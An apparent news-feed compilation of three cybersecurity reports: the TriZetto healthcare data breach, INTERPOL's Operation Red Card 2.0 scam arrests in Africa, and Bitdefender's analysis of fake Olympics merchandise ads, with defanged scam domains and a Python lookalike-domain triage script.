Several organizations have confirmed that their patients’ information was compromised in the cyberattack. One of these is OCHIN, a nonprofit consultancy firm that provides healthcare technology to some 300 rural and community care providers across the United States. Other healthcare providers across California have also confirmed that their patients were affected.

According to TriZetto, not every customer was affected by the breach.

TriZetto is the latest major health tech company to confirm a hack in recent years.

In 2024, a ransomware attack at Change Healthcare, another health tech giant that processes some 15 billion healthcare transactions, allowed hackers to make off with more than 192 million patient files. The cyberattack sparked outages across the U.S., leaving many without access to medical treatments or medications.

Updated with comment from Cognizant.

techcrunch.com EN 2026 US TriZetto cyberattack
Major operation in Africa targeting online scams nets 651 arrests, recovers USD 4.3 million https://www.interpol.int/en/News-and-Events/News/2026/Major-operation-in-Africa-targeting-online-scams-nets-651-arrests-recovers-USD-4.3-million
20/02/2026 18:29:51

www.interpol.int
18 February 2026

Cyber operation dismantles criminal networks running transnational fraud schemes

LYON, France – Law enforcement agencies from 16 African countries have made 651 arrests and recovered more than USD 4.3 million in an international cybercrime operation against online scams.

Operation Red Card 2.0 (8 December 2025 to 30 January 2026) targeted the infrastructure and actors behind high-yield investment scams, mobile money fraud and fraudulent mobile loan applications.

During the eight-week operation, investigations exposed scams linked to over USD 45 million in financial losses and identified 1,247 victims, predominantly from the African continent but also from other regions of the world. Authorities also seized 2,341 devices and took down 1,442 malicious IPs, domains and servers, as well as other related infrastructure.

INTERPOL supported the operation through critical intelligence sharing, real-time information exchange and capacity-building activities, including training on digital forensic tools.

Neal Jetton, INTERPOL’s Director of the Cybercrime Directorate, said:

“These organized cybercriminal syndicates inflict devastating financial and psychological harm on individuals, businesses and entire communities with their false promises. Operation Red Card highlights the importance of collaboration when combatting transnational cybercrime. I encourage all victims of cybercrime to reach out to law enforcement for help.”

The architecture of fraud: Key cases reveal diverse scam models

In Nigeria, police dismantled a high-yield investment fraud ring that recruited young individuals to carry out cyber-enabled crimes using phishing, identity theft, social engineering and fake digital asset investment schemes. Over 1,000 fraudulent social media accounts were taken down and investigators uncovered a residential property constructed by the syndicate ringleader to serve as the operational hub for the criminal activities.

In Kenya, authorities made 27 arrests linked to fraud schemes that used messaging apps, social media and fictitious testimonials to lure victims into making fake investments in reputable global corporations. Scammers solicited small initial investments ‒ as low as USD 50 ‒ with claims of lucrative returns. Victims were shown fabricated account statements or dashboards but withdrawal requests were systematically blocked.

In Côte d’Ivoire, law enforcement made 58 arrests and seized 240 mobile phones, 25 laptops and over 300 SIM cards in a targeted operation against mobile loan fraud. These scams predominantly targeted vulnerable populations through deceptive mobile applications and messaging services, attracting victims with promises of quick, unsecured loans, only to impose fees, enforce abusive debt-collection practices and illicitly harvest sensitive personal and financial data.

In a separate major success for Nigerian authorities, six members of a sophisticated cybercrime syndicate were arrested for infiltrating the internal platform of a major telecommunications provider through compromised staff login credentials. An investigation led to the disruption of the scheme, which involved siphoning significant volumes of airtime and data for illegal resale.

During Operation Red Card 2.0, INTERPOL worked closely with its partners, Cybercrime Atlas, Team Cymru, Trend Micro, TRM Labs and Uppsala Security, leveraging their data and expertise to provide critical intelligence to participating countries.

Notes to editors

The operation was conducted under the African Joint Operation against Cybercrime (AFJOC), an initiative funded by the UK’s Foreign, Commonwealth & Development Office.

The Global Action on Cybercrime Enhanced (GLACY-e) project, a joint initiative of the European Union and the Council of Europe, provided operation-specific support.

Participating member countries

Angola, Benin, Cameroon, Côte d’Ivoire, Chad, Gabon, Gambia, Ghana, Kenya, Namibia, Nigeria, Rwanda, Senegal, Uganda, Zambia and Zimbabwe.

www.interpol.int EN 2026 Africa Operation-Red-Card-2.0
Fake ‘Olympics Shop’ Ads on Meta Lead Netizens to Cloned Websites Promising 80% Off Merch https://www.bitdefender.com/en-gb/blog/hotforsecurity/fake-olympics-shop-ads-on-meta-lead-netizens-to-cloned-websites-promising-80-off-merch
19/02/2026 10:47:56

bitdefender.com
Alina BÎZGĂ
February 17, 2026

Bitdefender Labs is tracking an ongoing scam campaign on Meta platforms targeting people in the EU and the US, using fraudulent “Olympics Shop” advertisements that offer discounts of up to 80% on Milano Cortina 2026 merchandise.

Users who click on these ads and interact with the fraudulent websites expose themselves to several risks. Many similar scam operations are designed to steal payment card information at checkout, harvest personal details such as names, addresses, phone numbers, and email accounts, and in some cases collect login credentials.

Victims may also receive counterfeit merchandise — or nothing at all — after completing a purchase. In many instances, the sites disappear shortly after processing payments, leaving buyers with no way to recover their money.

At a glance, the ads look legitimate.

They feature official Olympic imagery, professional product photos, and convincing promotional messages such as:

“Olympics Exclusive! Up to 80% OFF.
30 Days No Excuse Free Return.
🛒Get Yours Before Out of Stock!”

“Olympics Esclusivo! Sconti fino all'80%.” (Italian: “Olympics Exclusive! Discounts up to 80%.”)
“Reso gratuito entro 30 giorni, senza domande.” (“Free returns within 30 days, no questions asked.”)
“Acquistalo prima che finisca!” (“Buy it before it runs out!”)

But the danger begins after the click.

Near-Perfect Clones of the Official Olympics Shop

The fraudulent websites are not crude copies – they are near-perfect replicas of the official Olympics merchandise store.

Bitdefender Labs observed that the scam sites use:

The same product photos
Identical color schemes
The same merchandise collections
Official branding elements
Similar layout structure

At a glance, most users would struggle to tell the difference.

The deception lies in the small details.

For example:

The legitimate store promotes “Sign up & Save 15%.”
The scam websites advertise “Sign & Save 80%.”
Official Olympics Shop

Fake Olympics Shop

That small wording change reflects the core tactic: inflate discounts to trigger a sense of urgency and bypass skepticism.

Font rendering may be slightly different. Minor layout inconsistencies appear in certain sections. Domain names look similar but are newly registered and unrelated to the official organization.

These subtle discrepancies are easy to miss when a user is focused on a limited-time deal.

Coordinated Scam Infrastructure

This campaign shows clear signs of coordination, and as Labs researcher Andreea Olariu points out, most of the fraudulent domains were registered within days of each other:

www.olympics2026[.]store – created Feb 3
Olympicseu[.]shop – created Feb 9
olympics-sale[.]top – created Feb 9
olympics-hot[.]top – created Feb 9
www.olympics-top[.]shop – created Feb 10
Olympicssportswear[.]shop – created Feb 10
Olympexapparel[.]shop – created Feb 10
Lifestylecollection[.]shop – created Feb 10
www.2026olympics[.]store – created Feb 11

Following the initial detection of the scam advertisements, Olariu observed ongoing domain registrations consistent with the same impersonation strategy. The daily appearance of new lookalike domains indicates an adaptive infrastructure designed to evade detection and extend the campaign’s lifespan.

Most recent domains include:

Olymponline[.]top – created Feb 11
Postolympicsale[.]com – created Feb 11
sale-olympics[.]top – created Feb 11
olympics-save[.]top – created Feb 11
olympicssportswears[.]shop – created Feb 11
olympicsfashionhub[.]shop – created Feb 12

All these domains are flagged as fraudulent by Bitdefender security systems.

In some instances, ads appear to display the official shop preview but silently redirect users to a scam domain such as www.olympics2026[.]store.

Newly Created Facebook Pages Running the Ads

Another strong indicator of fraud: the Facebook pages promoting these ads are newly created.

Bitdefender Labs observed that several of these pages were set up on the same day the scam domains were registered. This suggests a rapid deployment model:

Register domain
Clone official website
Create Facebook page
Launch ad campaign
Begin collecting payments

All within a short time window.
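The signals the article describes, brand keywords in the hostname, the cheap TLDs the campaign favoured, and registrations bunched within days of the first sighting, can be turned into a simple triage heuristic. The Python below is an added illustration and is not Bitdefender's code; it scores the domains the article lists (dates transcribed from the lists above, year assumed) and reports the busiest registration day. The campaign-start date, the 14-day window, the scoring weights, the allowlisted "official-shop.example" domain and the benign "olympic-lifting-club.org" comparison entry are assumptions, not facts from the article.

```python
"""Lookalike-domain triage, added as an illustration (not Bitdefender's code).

Scores candidate domains on the signals described in the article: a brand
keyword in the registered label, a cheap TLD the campaign favoured, and a
registration date within days of the first sighting.  Year, campaign start,
window, weights, allowlist and benign comparison domains are assumptions.
"""
from collections import Counter
from dataclasses import dataclass
from datetime import date

# Assumed: the brand's genuine storefront (constructed placeholder name).
ALLOWLIST = {"official-shop.example"}
BRAND_TOKENS = ("olympic", "olymp")        # "olymp" also catches Olympex*
RISKY_TLDS = {"store", "shop", "top"}      # TLDs seen in the article's list
CAMPAIGN_START = date(2026, 2, 3)          # assumed: earliest listed registration
MAX_AGE_DAYS = 14                          # assumed recency window


@dataclass(frozen=True)
class Candidate:
    domain: str    # may be defanged, as in the article
    created: date  # registration date, e.g. from WHOIS/RDAP


def refang(domain: str) -> str:
    """Restore a defanged indicator ('x[.]shop', or the article's 'x.[]shop')."""
    return domain.replace("[.]", ".").replace(".[]", ".").strip().lower()


def registrable(host: str) -> str:
    """Strip a leading 'www.' so scoring applies to the registered name."""
    return host[4:] if host.startswith("www.") else host


def score(c: Candidate) -> dict:
    """Return the normalised domain, an integer risk score and the reasons."""
    host = registrable(refang(c.domain))
    if host in ALLOWLIST:
        return {"domain": host, "score": 0, "reasons": ["allowlisted"]}
    label, _, tld = host.rpartition(".")
    points, reasons = 0, []
    if any(tok in label for tok in BRAND_TOKENS):
        points += 2
        reasons.append("brand keyword in label")
    if tld in RISKY_TLDS:
        points += 1
        reasons.append(f"risky TLD .{tld}")
    age = (c.created - CAMPAIGN_START).days
    if 0 <= age <= MAX_AGE_DAYS:
        points += 2
        reasons.append(f"registered {age} day(s) after campaign start")
    return {"domain": host, "score": points, "reasons": reasons}


def triage(cands, threshold: int = 4) -> list:
    """Keep only candidates whose score reaches the threshold."""
    return [r for r in map(score, cands) if r["score"] >= threshold]


def registration_burst(cands):
    """Busiest registration day among non-allowlisted candidates, with its count."""
    counts = Counter(c.created for c in cands if score(c)["score"] > 0)
    return counts.most_common(1)[0]


# Domains and dates transcribed from the article (year assumed), followed by
# two constructed benign comparison entries.
SAMPLE = [
    Candidate("www.olympics2026[.]store", date(2026, 2, 3)),
    Candidate("Olympicseu[.]shop", date(2026, 2, 9)),
    Candidate("olympics-sale[.]top", date(2026, 2, 9)),
    Candidate("olympics-hot[.]top", date(2026, 2, 9)),
    Candidate("www.olympics-top[.]shop", date(2026, 2, 10)),
    Candidate("Olympicssportswear[.]shop", date(2026, 2, 10)),
    Candidate("Olympexapparel[.]shop", date(2026, 2, 10)),
    Candidate("Lifestylecollection[.]shop", date(2026, 2, 10)),
    Candidate("www.2026olympics[.]store", date(2026, 2, 11)),
    Candidate("Olymponline[.]top", date(2026, 2, 11)),
    Candidate("Postolympicsale[.]com", date(2026, 2, 11)),
    Candidate("sale-olympics[.]top", date(2026, 2, 11)),
    Candidate("olympics-save[.]top", date(2026, 2, 11)),
    Candidate("olympicssportswears[.]shop", date(2026, 2, 11)),
    Candidate("olympicsfashionhub.[]shop", date(2026, 2, 12)),
    Candidate("official-shop.example", date(2015, 6, 1)),      # constructed
    Candidate("olympic-lifting-club.org", date(2012, 3, 14)),  # constructed
]

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(f"{hit['score']}  {hit['domain']:32} {'; '.join(hit['reasons'])}")
    day, n = registration_burst(SAMPLE)
    print(f"busiest registration day: {day} ({n} domains)")
```

Fourteen of the article's fifteen domains reach the threshold; Lifestylecollection[.]shop does not, because it carries no brand token and scores only on TLD and recency. That is the limit of keyword matching: a domain like that is tied to the campaign through shared infrastructure (hosting, registrant, ad pages), which is why the article's note that Facebook pages were created the same day as the domains matters more than any single name. The long-standing olympic-lifting-club.org entry shows why registration age is needed alongside the keyword: brand words alone would flag legitimate older sites.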

Legitimate global brands rarely create brand-new pages and immediately launch aggressive 80% discount campaigns tied to major international events.

The sophistication of the cloning significantly increases the risk. When scam sites mirror official branding almost perfectly, users default to visual familiarity instead of domain verification.

That’s exactly what attackers are counting on.

bitdefender.com EN 2026 Fake Olympics-Shop Ads scam